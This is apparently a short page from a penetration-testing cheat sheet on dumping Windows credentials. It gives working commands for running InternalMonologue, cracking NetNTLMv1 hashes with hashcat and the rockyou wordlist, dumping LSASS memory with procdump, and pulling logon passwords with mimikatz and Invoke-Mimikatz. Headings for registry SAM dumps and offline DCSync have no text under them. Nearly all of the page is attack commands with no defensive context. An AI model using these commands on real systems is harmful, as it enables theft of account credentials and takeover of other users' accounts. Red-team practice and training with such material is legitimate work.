Alternate Cred Dumps
Internal Monologue
Internal monologue is a way of dumping creds without touching LSASS.
Using Internal Monologue
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]Cracking Returned Hashes
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force Procdump + Mimikatz
# Dump with sysinternal windows signed binary
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords
# Viewing dump with invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'Reg SAM / Security / System
Offline DCSync
Last updated
Was this helpful?